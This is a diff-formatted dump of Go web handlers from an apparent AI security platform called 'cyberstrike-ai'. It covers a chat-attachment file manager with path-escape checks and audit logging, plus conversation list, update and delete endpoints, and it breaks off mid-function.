if s == "true" || s == "1" || s == "yes" {
|
||||
return true, true
|
||||
}
|
||||
if s == "false" || s == "0" || s == "no" {
|
||||
return false, true
|
||||
}
|
||||
case float64:
|
||||
return t != 0, true
|
||||
}
|
||||
return false, false
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,528 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"sort"
|
||||
"strings"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const (
|
||||
chatUploadsRootDirName = "chat_uploads"
|
||||
maxChatUploadEditBytes = 2 * 1024 * 1024 // 文本编辑上限
|
||||
)
|
||||
|
||||
// ChatUploadsHandler 对话中上传附件(chat_uploads 目录)的管理 API
|
||||
type ChatUploadsHandler struct {
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *ChatUploadsHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewChatUploadsHandler 创建处理器
|
||||
func NewChatUploadsHandler(logger *zap.Logger) *ChatUploadsHandler {
|
||||
return &ChatUploadsHandler{logger: logger}
|
||||
}
|
||||
|
||||
func (h *ChatUploadsHandler) absRoot() (string, error) {
|
||||
cwd, err := os.Getwd()
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return filepath.Abs(filepath.Join(cwd, chatUploadsRootDirName))
|
||||
}
|
||||
|
||||
// resolveUnderChatUploads 校验 relativePath(使用 / 分隔)对应文件必须在 chat_uploads 根下
|
||||
func (h *ChatUploadsHandler) resolveUnderChatUploads(relativePath string) (abs string, err error) {
|
||||
root, err := h.absRoot()
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
rel := strings.TrimSpace(relativePath)
|
||||
if rel == "" {
|
||||
return "", fmt.Errorf("empty path")
|
||||
}
|
||||
rel = filepath.Clean(filepath.FromSlash(rel))
|
||||
if rel == "." || strings.HasPrefix(rel, "..") {
|
||||
return "", fmt.Errorf("invalid path")
|
||||
}
|
||||
full := filepath.Join(root, rel)
|
||||
full, err = filepath.Abs(full)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
rootAbs, _ := filepath.Abs(root)
|
||||
if full != rootAbs && !strings.HasPrefix(full, rootAbs+string(filepath.Separator)) {
|
||||
return "", fmt.Errorf("path escapes chat_uploads root")
|
||||
}
|
||||
return full, nil
|
||||
}
|
||||
|
||||
// ChatUploadFileItem 列表项
|
||||
type ChatUploadFileItem struct {
|
||||
RelativePath string `json:"relativePath"`
|
||||
AbsolutePath string `json:"absolutePath"` // 服务器上的绝对路径,便于在对话中引用(与附件落盘路径一致)
|
||||
Name string `json:"name"`
|
||||
Size int64 `json:"size"`
|
||||
ModifiedUnix int64 `json:"modifiedUnix"`
|
||||
Date string `json:"date"`
|
||||
ConversationID string `json:"conversationId"`
|
||||
// SubPath 为日期、会话目录之下的子路径(不含文件名),如 date/conv/a/b/file 则为 "a/b";无嵌套则为 ""。
|
||||
SubPath string `json:"subPath"`
|
||||
}
|
||||
|
||||
// List GET /api/chat-uploads
|
||||
func (h *ChatUploadsHandler) List(c *gin.Context) {
|
||||
conversationFilter := strings.TrimSpace(c.Query("conversation"))
|
||||
root, err := h.absRoot()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
// 保证根目录存在,否则「按文件夹」浏览时无法 mkdir,且首次列表为空时界面无路径工具栏
|
||||
if err := os.MkdirAll(root, 0755); err != nil {
|
||||
h.logger.Warn("创建 chat_uploads 根目录失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
var files []ChatUploadFileItem
|
||||
var folders []string
|
||||
err = filepath.WalkDir(root, func(path string, d os.DirEntry, walkErr error) error {
|
||||
if walkErr != nil {
|
||||
return walkErr
|
||||
}
|
||||
rel, err := filepath.Rel(root, path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if rel == "." {
|
||||
return nil
|
||||
}
|
||||
relSlash := filepath.ToSlash(rel)
|
||||
if d.IsDir() {
|
||||
folders = append(folders, relSlash)
|
||||
return nil
|
||||
}
|
||||
info, err := d.Info()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
parts := strings.Split(relSlash, "/")
|
||||
var dateStr, convID string
|
||||
if len(parts) >= 2 {
|
||||
dateStr = parts[0]
|
||||
}
|
||||
if len(parts) >= 3 {
|
||||
convID = parts[1]
|
||||
}
|
||||
var subPath string
|
||||
if len(parts) >= 4 {
|
||||
subPath = strings.Join(parts[2:len(parts)-1], "/")
|
||||
}
|
||||
if conversationFilter != "" && convID != conversationFilter {
|
||||
return nil
|
||||
}
|
||||
absPath, _ := filepath.Abs(path)
|
||||
files = append(files, ChatUploadFileItem{
|
||||
RelativePath: relSlash,
|
||||
AbsolutePath: absPath,
|
||||
Name: d.Name(),
|
||||
Size: info.Size(),
|
||||
ModifiedUnix: info.ModTime().Unix(),
|
||||
Date: dateStr,
|
||||
ConversationID: convID,
|
||||
SubPath: subPath,
|
||||
})
|
||||
return nil
|
||||
})
|
||||
if err != nil {
|
||||
h.logger.Warn("列举对话附件失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if conversationFilter != "" {
|
||||
filteredFolders := make([]string, 0, len(folders))
|
||||
for _, rel := range folders {
|
||||
parts := strings.Split(rel, "/")
|
||||
if len(parts) >= 2 && parts[1] == conversationFilter {
|
||||
filteredFolders = append(filteredFolders, rel)
|
||||
continue
|
||||
}
|
||||
if len(parts) == 1 {
|
||||
prefix := rel + "/"
|
||||
for _, f := range files {
|
||||
if strings.HasPrefix(f.RelativePath, prefix) {
|
||||
filteredFolders = append(filteredFolders, rel)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
folders = filteredFolders
|
||||
}
|
||||
sort.Strings(folders)
|
||||
sort.Slice(files, func(i, j int) bool {
|
||||
return files[i].ModifiedUnix > files[j].ModifiedUnix
|
||||
})
|
||||
c.JSON(http.StatusOK, gin.H{"files": files, "folders": folders})
|
||||
}
|
||||
|
||||
// Download GET /api/chat-uploads/download?path=...
|
||||
func (h *ChatUploadsHandler) Download(c *gin.Context) {
|
||||
p := c.Query("path")
|
||||
abs, err := h.resolveUnderChatUploads(p)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
st, err := os.Stat(abs)
|
||||
if err != nil || st.IsDir() {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "file not found"})
|
||||
return
|
||||
}
|
||||
c.FileAttachment(abs, filepath.Base(abs))
|
||||
}
|
||||
|
||||
type chatUploadPathBody struct {
|
||||
Path string `json:"path"`
|
||||
}
|
||||
|
||||
// Delete DELETE /api/chat-uploads
|
||||
func (h *ChatUploadsHandler) Delete(c *gin.Context) {
|
||||
var body chatUploadPathBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil || strings.TrimSpace(body.Path) == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"})
|
||||
return
|
||||
}
|
||||
abs, err := h.resolveUnderChatUploads(body.Path)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
st, err := os.Stat(abs)
|
||||
if err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "file not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if st.IsDir() {
|
||||
if err := os.RemoveAll(abs); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
} else {
|
||||
if err := os.Remove(abs); err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "file not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "file", "delete", "删除对话附件", "chat_upload", body.Path, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
type chatUploadMkdirBody struct {
|
||||
Parent string `json:"parent"`
|
||||
Name string `json:"name"`
|
||||
}
|
||||
|
||||
// Mkdir POST /api/chat-uploads/mkdir — 在 parent 目录下新建子目录(parent 为 chat_uploads 下相对路径,空表示根目录;name 为单段目录名)
|
||||
func (h *ChatUploadsHandler) Mkdir(c *gin.Context) {
|
||||
var body chatUploadMkdirBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"})
|
||||
return
|
||||
}
|
||||
name := strings.TrimSpace(body.Name)
|
||||
if name == "" || strings.ContainsAny(name, `/\`) || name == "." || name == ".." {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid name"})
|
||||
return
|
||||
}
|
||||
if utf8.RuneCountInString(name) > 200 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "name too long"})
|
||||
return
|
||||
}
|
||||
|
||||
parent := strings.TrimSpace(body.Parent)
|
||||
parent = filepath.ToSlash(filepath.Clean(filepath.FromSlash(parent)))
|
||||
parent = strings.Trim(parent, "/")
|
||||
if parent == "." {
|
||||
parent = ""
|
||||
}
|
||||
|
||||
root, err := h.absRoot()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if parent != "" {
|
||||
absParent, err := h.resolveUnderChatUploads(parent)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
st, err := os.Stat(absParent)
|
||||
if err != nil || !st.IsDir() {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "parent not found"})
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
var rel string
|
||||
if parent == "" {
|
||||
rel = name
|
||||
} else {
|
||||
rel = parent + "/" + name
|
||||
}
|
||||
absNew, err := h.resolveUnderChatUploads(rel)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if _, err := os.Stat(absNew); err == nil {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "already exists"})
|
||||
return
|
||||
}
|
||||
if err := os.Mkdir(absNew, 0755); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
relOut, _ := filepath.Rel(root, absNew)
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true, "relativePath": filepath.ToSlash(relOut)})
|
||||
}
|
||||
|
||||
type chatUploadRenameBody struct {
|
||||
Path string `json:"path"`
|
||||
NewName string `json:"newName"`
|
||||
}
|
||||
|
||||
// Rename PUT /api/chat-uploads/rename
|
||||
func (h *ChatUploadsHandler) Rename(c *gin.Context) {
|
||||
var body chatUploadRenameBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"})
|
||||
return
|
||||
}
|
||||
newName := strings.TrimSpace(body.NewName)
|
||||
if newName == "" || strings.ContainsAny(newName, `/\`) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid newName"})
|
||||
return
|
||||
}
|
||||
abs, err := h.resolveUnderChatUploads(body.Path)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
dir := filepath.Dir(abs)
|
||||
newAbs := filepath.Join(dir, filepath.Base(newName))
|
||||
root, _ := h.absRoot()
|
||||
newAbs, _ = filepath.Abs(newAbs)
|
||||
if newAbs != root && !strings.HasPrefix(newAbs, root+string(filepath.Separator)) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid target path"})
|
||||
return
|
||||
}
|
||||
if err := os.Rename(abs, newAbs); err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "file not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
newRel, _ := filepath.Rel(root, newAbs)
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true, "relativePath": filepath.ToSlash(newRel)})
|
||||
}
|
||||
|
||||
type chatUploadContentBody struct {
|
||||
Path string `json:"path"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
|
||||
// GetContent GET /api/chat-uploads/content?path=...
|
||||
func (h *ChatUploadsHandler) GetContent(c *gin.Context) {
|
||||
p := c.Query("path")
|
||||
abs, err := h.resolveUnderChatUploads(p)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
st, err := os.Stat(abs)
|
||||
if err != nil || st.IsDir() {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "file not found"})
|
||||
return
|
||||
}
|
||||
if st.Size() > maxChatUploadEditBytes {
|
||||
c.JSON(http.StatusRequestEntityTooLarge, gin.H{"error": "file too large for editor"})
|
||||
return
|
||||
}
|
||||
b, err := os.ReadFile(abs)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if !utf8.Valid(b) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "binary file not editable in UI"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"content": string(b)})
|
||||
}
|
||||
|
||||
// PutContent PUT /api/chat-uploads/content
|
||||
func (h *ChatUploadsHandler) PutContent(c *gin.Context) {
|
||||
var body chatUploadContentBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"})
|
||||
return
|
||||
}
|
||||
if !utf8.ValidString(body.Content) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "content must be valid UTF-8"})
|
||||
return
|
||||
}
|
||||
if len(body.Content) > maxChatUploadEditBytes {
|
||||
c.JSON(http.StatusRequestEntityTooLarge, gin.H{"error": "content too large"})
|
||||
return
|
||||
}
|
||||
abs, err := h.resolveUnderChatUploads(body.Path)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := os.WriteFile(abs, []byte(body.Content), 0644); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
func chatUploadShortRand(n int) string {
|
||||
const letters = "0123456789abcdef"
|
||||
b := make([]byte, n)
|
||||
_, _ = rand.Read(b)
|
||||
for i := range b {
|
||||
b[i] = letters[int(b[i])%len(letters)]
|
||||
}
|
||||
return string(b)
|
||||
}
|
||||
|
||||
// Upload POST /api/chat-uploads multipart: file;conversationId 可选;relativeDir 可选(chat_uploads 下目录的相对路径,将文件直接上传至该目录)
|
||||
func (h *ChatUploadsHandler) Upload(c *gin.Context) {
|
||||
fh, err := c.FormFile("file")
|
||||
if err != nil || fh == nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "missing file"})
|
||||
return
|
||||
}
|
||||
root, err := h.absRoot()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
var targetDir string
|
||||
targetRel := strings.TrimSpace(c.PostForm("relativeDir"))
|
||||
if targetRel != "" {
|
||||
absDir, err := h.resolveUnderChatUploads(targetRel)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
st, err := os.Stat(absDir)
|
||||
if err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
if err := os.MkdirAll(absDir, 0755); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
} else {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
} else if !st.IsDir() {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "relativeDir is not a directory"})
|
||||
return
|
||||
}
|
||||
targetDir = absDir
|
||||
} else {
|
||||
convID := strings.TrimSpace(c.PostForm("conversationId"))
|
||||
convDir := convID
|
||||
if convDir == "" {
|
||||
convDir = "_manual"
|
||||
} else {
|
||||
convDir = strings.ReplaceAll(convDir, string(filepath.Separator), "_")
|
||||
}
|
||||
dateStr := time.Now().Format("2006-01-02")
|
||||
targetDir = filepath.Join(root, dateStr, convDir)
|
||||
if err := os.MkdirAll(targetDir, 0755); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
baseName := filepath.Base(fh.Filename)
|
||||
if baseName == "" || baseName == "." {
|
||||
baseName = "file"
|
||||
}
|
||||
baseName = strings.ReplaceAll(baseName, string(filepath.Separator), "_")
|
||||
ext := filepath.Ext(baseName)
|
||||
nameNoExt := strings.TrimSuffix(baseName, ext)
|
||||
suffix := fmt.Sprintf("_%s_%s", time.Now().Format("150405"), chatUploadShortRand(6))
|
||||
var unique string
|
||||
if ext != "" {
|
||||
unique = nameNoExt + suffix + ext
|
||||
} else {
|
||||
unique = baseName + suffix
|
||||
}
|
||||
fullPath := filepath.Join(targetDir, unique)
|
||||
src, err := fh.Open()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
defer src.Close()
|
||||
dst, err := os.Create(fullPath)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
defer dst.Close()
|
||||
if _, err := io.Copy(dst, src); err != nil {
|
||||
_ = os.Remove(fullPath)
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
rel, _ := filepath.Rel(root, fullPath)
|
||||
absSaved, _ := filepath.Abs(fullPath)
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "file", "upload", "上传对话附件", "chat_upload", filepath.ToSlash(rel), map[string]interface{}{
|
||||
"name": unique,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"ok": true,
|
||||
"relativePath": filepath.ToSlash(rel),
|
||||
"absolutePath": absSaved,
|
||||
"name": unique,
|
||||
})
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,312 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ConversationHandler 对话处理器
|
||||
type ConversationHandler struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *ConversationHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewConversationHandler 创建新的对话处理器
|
||||
func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler {
|
||||
return &ConversationHandler{
|
||||
db: db,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// CreateConversationRequest 创建对话请求
|
||||
type CreateConversationRequest struct {
|
||||
Title string `json:"title"`
|
||||
ProjectID string `json:"projectId,omitempty"`
|
||||
}
|
||||
|
||||
// SetConversationProjectRequest 设置对话所属项目
|
||||
type SetConversationProjectRequest struct {
|
||||
ProjectID string `json:"projectId"` // 空字符串表示解除绑定
|
||||
}
|
||||
|
||||
// CreateConversation 创建新对话
|
||||
func (h *ConversationHandler) CreateConversation(c *gin.Context) {
|
||||
var req CreateConversationRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
title := req.Title
|
||||
if title == "" {
|
||||
title = "新对话"
|
||||
}
|
||||
|
||||
meta := audit.ConversationCreateMetaFromGin(c, "api")
|
||||
meta.ProjectID = strings.TrimSpace(req.ProjectID)
|
||||
conv, err := h.db.CreateConversation(title, meta)
|
||||
if err != nil {
|
||||
h.logger.Error("创建对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, conv)
|
||||
}
|
||||
|
||||
// SetConversationProject 设置或清除对话绑定的项目
|
||||
func (h *ConversationHandler) SetConversationProject(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
var req SetConversationProjectRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if _, err := h.db.GetConversation(id); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
|
||||
return
|
||||
}
|
||||
if err := h.db.SetConversationProjectID(id, req.ProjectID); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"success": true, "projectId": strings.TrimSpace(req.ProjectID)})
|
||||
}
|
||||
|
||||
// ListConversations 列出对话
|
||||
func (h *ConversationHandler) ListConversations(c *gin.Context) {
|
||||
limitStr := c.DefaultQuery("limit", "50")
|
||||
offsetStr := c.DefaultQuery("offset", "0")
|
||||
search := c.Query("search") // 获取搜索参数
|
||||
|
||||
limit, _ := strconv.Atoi(limitStr)
|
||||
offset, _ := strconv.Atoi(offsetStr)
|
||||
|
||||
if limit <= 0 {
|
||||
limit = 50
|
||||
}
|
||||
if limit > 1000 {
|
||||
limit = 1000
|
||||
}
|
||||
|
||||
excludeGrouped := strings.TrimSpace(search) == "" &&
|
||||
(c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1")
|
||||
|
||||
var conversations []*database.Conversation
|
||||
var total int
|
||||
var err error
|
||||
if excludeGrouped {
|
||||
conversations, err = h.db.ListUngroupedConversations(limit, offset)
|
||||
if err == nil {
|
||||
total, err = h.db.CountUngroupedConversations()
|
||||
}
|
||||
} else {
|
||||
conversations, err = h.db.ListConversations(limit, offset, search)
|
||||
if err == nil {
|
||||
total, err = h.db.CountConversations(search)
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
h.logger.Error("获取对话列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if conversations == nil {
|
||||
conversations = []*database.Conversation{}
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"conversations": conversations,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
|
||||
// GetConversation 获取对话
|
||||
func (h *ConversationHandler) GetConversation(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
// 默认轻量加载,只有用户需要展开详情时再按需拉取
|
||||
// include_process_details=1/true 时返回全量 processDetails(兼容旧行为)
|
||||
includeStr := c.DefaultQuery("include_process_details", "0")
|
||||
include := includeStr == "1" || includeStr == "true" || includeStr == "yes"
|
||||
|
||||
var (
|
||||
conv *database.Conversation
|
||||
err error
|
||||
)
|
||||
if include {
|
||||
conv, err = h.db.GetConversation(id)
|
||||
} else {
|
||||
conv, err = h.db.GetConversationLite(id)
|
||||
}
|
||||
if err != nil {
|
||||
h.logger.Error("获取对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, conv)
|
||||
}
|
||||
|
||||
// GetMessageProcessDetails 获取指定消息的过程详情(按需加载)
|
||||
func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
|
||||
messageID := c.Param("id")
|
||||
if messageID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "message id required"})
|
||||
return
|
||||
}
|
||||
|
||||
details, err := h.db.GetProcessDetails(messageID)
|
||||
if err != nil {
|
||||
h.logger.Error("获取过程详情失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
details = database.DedupeConsecutiveProcessDetails(details)
|
||||
|
||||
// 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致)
|
||||
out := make([]map[string]interface{}, 0, len(details))
|
||||
for _, d := range details {
|
||||
var data interface{}
|
||||
if d.Data != "" {
|
||||
if err := json.Unmarshal([]byte(d.Data), &data); err != nil {
|
||||
h.logger.Warn("解析过程详情数据失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
out = append(out, map[string]interface{}{
|
||||
"id": d.ID,
|
||||
"messageId": d.MessageID,
|
||||
"conversationId": d.ConversationID,
|
||||
"eventType": d.EventType,
|
||||
"message": d.Message,
|
||||
"data": data,
|
||||
"createdAt": d.CreatedAt,
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"processDetails": out})
|
||||
}
|
||||
|
||||
// UpdateConversationRequest 更新对话请求
|
||||
type UpdateConversationRequest struct {
|
||||
Title string `json:"title"`
|
||||
}
|
||||
|
||||
// UpdateConversation 更新对话
|
||||
func (h *ConversationHandler) UpdateConversation(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
var req UpdateConversationRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if req.Title == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "标题不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.UpdateConversationTitle(id, req.Title); err != nil {
|
||||
h.logger.Error("更新对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 返回更新后的对话
|
||||
conv, err := h.db.GetConversation(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取更新后的对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, conv)
|
||||
}
|
||||
|
||||
// DeleteConversation 删除对话
|
||||
func (h *ConversationHandler) DeleteConversation(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
if err := h.db.DeleteConversation(id); err != nil {
|
||||
h.logger.Error("删除对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "conversation",
|
||||
Action: "delete",
|
||||
Result: "success",
|
||||
ResourceType: "conversation",
|
||||
ResourceID: id,
|
||||
Message: "删除对话",
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||
}
|
||||
|
||||
// DeleteTurnRequest 删除一轮对话(POST /api/conversations/:id/delete-turn)
|
||||
type DeleteTurnRequest struct {
|
||||
MessageID string `json:"messageId"`
|
||||
}
|
||||
|
||||
// DeleteConversationTurn 删除锚点消息所在轮次(从该轮 user 到下一轮 user 之前),并清空 last_react_*。
|
||||
func (h *ConversationHandler) DeleteConversationTurn(c *gin.Context) {
|
||||
conversationID := c.Param("id")
|
||||
if conversationID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "conversation id required"})
|
||||
return
|
||||
}
|
||||
|
||||
var req DeleteTurnRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil || req.MessageID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "messageId required"})
|
||||
return
|
||||
}
|
||||
|
||||
if _, err := h.db.GetConversation(conversationID); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
deletedIDs, err := h.db.DeleteConversationTurn(conversationID, req.MessageID)
|
||||
if err != nil {
|
||||
h.logger.Warn("删除对话轮次失败",
|
||||
zap.String("conversationId", conversationID),
|
||||
zap.String("messageId", req.MessageID),
|
||||
zap.Error(err),
|
||||
)
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
